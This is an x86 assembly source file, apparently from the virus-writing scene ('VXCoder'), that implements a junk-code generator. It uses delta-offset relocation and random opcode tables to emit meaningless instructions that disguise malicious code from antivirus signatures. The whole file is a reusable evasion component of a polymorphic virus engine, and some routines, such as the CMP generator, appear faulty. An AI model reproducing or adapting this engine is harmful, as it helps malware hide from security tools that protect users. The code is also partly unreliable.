; Trash generator from VXCoder

garbage:                                            ;Subroutine to generations rubbish instruction

          push edx                                  ;We Save in "push" edx, ecx, ebx, ebp, esi                                      
		  push ecx
		  push esi
		  push ebp
		  push ebx
		  call delta_offset1
		  
delta_offset1:

          pop ebp                                   ;Delta - an offset
		  sub ebp,offset delta_offset1
		  
delta_offset2:

          mov eax,19                                ;We Choose casual image a variant to generations rubbish instruction
		  call brandom32
		  shl eax,1
		  lea esi,[ebp+table_offset]                ;In esi offset on table of the relative offsets
		  add esi,eax
		  xor eax,eax
		  lodsw
		  lea esi,[ebp+delta_offset2]
		  add eax,esi                               ;We Add offset of the subroutine
		  call eax
		  jmp delta_offset2
		  
;-=GENERATES INSTRUCTIONS=-

instructions_je:                                    ;Generation JE

          cmp cl,2
		  jl one_byte
		  mov eax,10
		  call brandom32
		  add al,70h
		  stosb
		  xor al,al
		  stosb
		  sub ecx,2
		  ret

instructions_not:                                   ;Generation NOT

          cmp cl,2
		  jl one_byte
		  mov al,0f7h
		  stosb
		  mov dl,0d0h
		  mov eax,2
		  call brandom32
		  shl eax,3
		  add dl,al
		  call free_reg
		  add al,dl
		  stosb
		  sub ecx,2
		  ret
		  
instructions_je2:                                    ;Generation JE

          cmp cl,6
		  jl one_byte
		  mov al,0fh
		  stosb
		  mov eax,10
		  call brandom32
		  add al,80h
		  stosb
		  xor eax,eax
		  stosd
		  sub ecx,6
		  ret
		  
instructions_x87:                                     ;Generation X87

          cmp cl,2
		  jl one_byte
		  mov al,0dch
		  stosb
		  mov eax,02fh
		  call brandom32
		  add al,0c0h
		  stosb
		  sub ecx,2
		  ret
		  
instructions_cmp:                                     ;Generation CMP

          cmp cl,2
		  jl one_byte
		  mov al,3ah
		  mov eax,3
		  call brandom32
		  add al,dl
		  stosb
		  call rnd_reg
		  shl eax,3
		  add al,0c0h
		  mov dl,al
		  call rnd_reg
		  add al,dl
		  stosb
		  sub ecx,2
		  ret
		  
instructions_xor:                                     ;Generation XOR

          cmp cl,2
		  jl one_byte
		  mov al,33h
		  stosb
		  call free_reg
		  shl eax,3
		  add al,0c0h
		  mov dl,al
		  call rnd_reg
		  add al,dl
		  stosb
		  sub ecx,2
		  ret
		  
instructions_test:                                    ;Generation TEST

          cmp cl,2
		  jl one_byte
		  mov dl,084h
		  mov eax,2
		  call brandom32
		  add al,dl
		  stosb
		  call rnd_reg
		  add al,0c0h
		  mov dl,al
		  call rnd_reg
		  add al,dl
		  stosb
		  sub ecx,2
		  ret
		  
instructions_movr:                                    ;Generation MOV

          cmp cl,2
		  jl one_byte
		  mov al,8bh
		  stosb
		  call free_reg
		  shl eax,3
		  add al,0c0h
		  mov dl,al
		  call rnd_reg
		  add al,dl
		  stosb
		  sub ecx,2
		  ret
		  
instructions_push:                                    ;Generation PUSH

          cmp cl,2
          jl one_byte
		  call rnd_reg
		  add al,50h
		  stosb
		  call free_reg
		  add al,58h
		  stosb
		  sub ecx,2
		  ret
		  
instructions_movc:                                    ;Generation MOV

          cmp cl,5
		  jl one_byte
		  call free_reg
		  add al,0b8h
		  stosb
		  call cool
		  stosd
		  sub ecx,5
		  ret
		  
instructions_jmp:                                     ;Generation JMP

          cmp cl,5
		  jl one_byte
		  mov al,0e9h
		  stosb
		  xor eax,eax
		  stosd
		  sub ecx,5
		  ret
		  
instructions_l32:                                     ;Generation ADD

          cmp cl,6
		  jl one_byte
		  mov al,81h
		  stosb
		  mov eax,4
		  call brandom32
		  add al,0ch
		  mov dl,10h
		  mul dl
		  mov dl,al
		  mov eax,2
		  call brandom32
		  shl al,3
		  add dl,al
		  call free_reg
		  add al,dl
		  stosb
		  call cool
		  stosd
		  sub ecx,6
		  ret
		  
instructions_lea:                                     ;Generation LEA

          cmp cl,6
		  jl one_byte
		  mov al,8dh
		  stosb
		  mov dl,08h
		  call free_reg
		  mul dl
		  add al,5
		  stosb
		  call cool
		  stosd
		  sub ecx,6
		  ret
		  
instructions_cl:                                      ;Generation CALL

          cmp cl,6
		  jl one_byte
		  mov al,0e8h
		  stosb
		  xor eax,eax
		  stosd
		  call free_reg
		  add al,58h
		  stosb
		  sub ecx,6
		  ret
		  
instructions_shl:                                     ;Generation SHL, ROL

          cmp cl,3
		  jl one_byte
		  mov al,0c1h
		  stosb
		  mov eax,6
		  call brandom32
		  shl eax,3
		  add al,0c0h
		  mov dl,al
		  call free_reg
		  add al,dl
		  stosb
		  mov eax,256
		  call brandom32
		  stosb
		  sub  ecx,3
		  ret
		  
instructions_a32:                                    ;Generation XADD, IMUL

          cmp cl,3
		  jl one_byte
		  mov al,0fh
		  stosb
		  lea esi,[ebp+three_byte_opcode]
		  mov eax,14
		  call brandom32
		  add esi,eax
		  movsb
		  mov dl,0c0h
		  call free_reg
		  shl eax,3
		  add dl,al
		  call free_reg
		  add al,dl
		  stosb
		  sub ecx,3
		  ret
		  
instructions_xchg:                                   ;Generation XCHG

          cmp cl,2
		  jl one_byte
		  mov al,087h
		  stosb
		  mov dl,0c0h
		  call free_reg
		  shl eax,3
		  add dl,al
		  call free_reg
		  add al,dl
		  stosb
		  sub ecx,2
		  ret
		  
instructions_mov1:                                   ;Generation MOV =)

          cmp cl,4
		  jl one_byte
		  mov al,066h
		  stosb
		  mov dl,0b8h
		  call free_reg
		  add al,dl
		  stosb
		  mov eax,0ffffh
		  call brandom32
		  stosw
		  sub ecx,4
		  ret
		  
one_byte:

          mov eax,3
		  call brandom32
		  cmp al,1
		  je instructions_inc
		  cmp al,2
		  je instructions_dec
		  lea esi,[ebp+one_byte_opcode]
		  mov eax,8
		  call brandom32
		  add esi,eax
		  test ecx,ecx
		  jz landing
		  movsb
		  dec ecx
		  ret
		  
instructions_inc:                                    ;Generation INC

          call free_reg
		  add al,40h
		  test ecx,ecx
		  jz landing
		  stosb
		  dec ecx
		  ret
		  
instructions_dec:                                    ;Generation DEC

          call free_reg
		  add al,48h
		  test ecx,ecx
		  jz landing
		  stosb
		  dec ecx
		  ret
		  
landing:

          add esp,4                                   ;We Pop back
		  pop ebx
		  pop ebp
		  pop esi
		  pop ecx
		  pop edx
		  ret
		  
free_reg:                                             ;Reception of the free register

          push edx ecx
		  
another:

          call rnd_reg
		  cmp al,bh
		  je another
		  cmp al,bl
		  je another
		  cmp al,00000100b
		  je another
		  pop ecx edx
		  ret
		  
rnd_reg:

          mov eax,8
		  call brandom32
		  ret
		  
table_offset:                                         ;Table of the relative offsets

          dw instructions_x87 -delta_offset2
		  dw instructions_movr -delta_offset2
		  dw instructions_push -delta_offset2
		  dw instructions_shl -delta_offset2
		  dw instructions_cmp -delta_offset2
		  dw instructions_xor -delta_offset2
		  dw one_byte -delta_offset2
		  dw instructions_movc -delta_offset2
		  dw instructions_je -delta_offset2
		  dw instructions_je2 -delta_offset2
		  dw instructions_l32 -delta_offset2
		  dw instructions_jmp -delta_offset2
		  dw instructions_lea -delta_offset2
		  dw instructions_test -delta_offset2
		  dw instructions_not -delta_offset2
		  dw instructions_xchg -delta_offset2
		  dw instructions_a32 -delta_offset2
		  dw instructions_mov1 -delta_offset2
		  dw instructions_cl -delta_offset2
		  
one_byte_opcode:

          std
		  cld
		  nop
		  clc
		  stc
		  cmc
		  db 0f2h
		  db 0f3h
		  
three_byte_opcode:

          db 0a3h,0abh,0adh,0b3h,0bbh,0bdh,0bfh
		  db 0b6h,0b7h,0beh,0afh,0bch,0c1h,0bdh